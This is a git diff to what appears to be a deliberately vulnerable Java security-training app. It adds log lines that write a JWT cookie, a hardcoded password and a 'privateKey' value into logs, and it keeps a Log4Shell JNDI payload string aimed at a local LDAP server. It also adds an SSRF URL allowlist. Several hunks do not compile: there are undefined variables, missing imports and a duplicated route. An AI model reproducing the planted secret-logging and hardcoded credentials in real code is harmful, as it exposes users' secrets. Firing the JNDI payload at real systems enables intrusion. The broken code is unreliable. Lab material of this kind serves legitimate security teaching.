diff --git a/src/main/java/org/joychou/controller/Jwt.java b/src/main/java/org/joychou/controller/Jwt.java index f3e4c126..12bd9d6f 100644 --- a/src/main/java/org/joychou/controller/Jwt.java +++ b/src/main/java/org/joychou/controller/Jwt.java @@ -43,6 +43,7 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque cookie.setPath("/"); cookie.setSecure(true); response.addCookie(cookie); + logger.info("cookie is: {}", cookie); return "Add jwt token cookie successfully. Cookie name is USER_COOKIE"; } diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index b2ea4060..577f2efd 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,13 +17,19 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { - logger.error(token); + String result = getResponse(token); + String privateKey = "parivate"; + logger.info("token: {}, privateKey: {}, result: {}", token, privateKey, result); return token; } public static void main(String[] args) { String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}"; - logger.error(poc); + logger.info(poc); + String privateKey = "parivate"; + if(StringUtils.isNotBlank(privateKey)) { + logger.error("token: {}, privateKey: {}", token, privateKey); + } } } diff --git a/src/main/java/org/joychou/controller/Log4j2.java b/src/main/java/org/joychou/controller/Log4j2.java new file mode 100644 index 00000000..2dcf1824 --- /dev/null +++ b/src/main/java/org/joychou/controller/Log4j2.java @@ -0,0 +1,36 @@ + +package org.joychou.controller; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +@RestController +public class Log4j2 { + + private static final Logger logger = LogManager.getLogger("Log4j2"); + + /** + * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} + * Default: error/fatal/off + * Fix: Update log4j to lastet version. + */ + @RequestMapping(value = "/log4j") + public String log4j(String token) { + String password = "Pass@0rd"; + logger.info("User password is " + password); + String privateKey = "parivate"; + logger.info("paramaters is {}", new Object[]{privateKey}); + if(StringUtils.isNotBlank(privateKey)) { + logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + } + return token; + } + + public static void main(String[] args) { + String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}"; + logger.info(poc); + } + +} diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java index f28b8b91..effc41e8 100644 --- a/src/main/java/org/joychou/controller/SSRF.java +++ b/src/main/java/org/joychou/controller/SSRF.java @@ -1,4 +1,6 @@ package org.joychou.controller; +import java.util.Arrays; +import java.util.List; import cn.hutool.http.HttpUtil; import org.joychou.security.SecurityUtil; diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java index c1eac95c..4d7ab515 100644 --- a/src/main/java/org/joychou/util/HttpUtils.java +++ b/src/main/java/org/joychou/util/HttpUtils.java @@ -32,6 +32,19 @@ * @author JoyChou 2020-04-06 */ public class HttpUtils { + private static final List ALLOWED_URLS = Arrays.asList( + "http://example.com", + "http://another-allowed-url.com" + ); + + private static boolean isValidUrl(String url) { + try { + URI uri = new URI(url); + return ALLOWED_URLS.contains(uri.getScheme() + "://" + uri.getHost()); + } catch (URISyntaxException e) { + return false; + } + } private final static Logger logger = LoggerFactory.getLogger(HttpUtils.class); @@ -203,6 +216,9 @@ public static void IOUtils(String url) { public static String HttpAsyncClients(String url) { + if (!isValidUrl(url)) { + return "Invalid URL"; + } CloseableHttpAsyncClient httpclient = HttpAsyncClients.createDefault(); try { httpclient.start();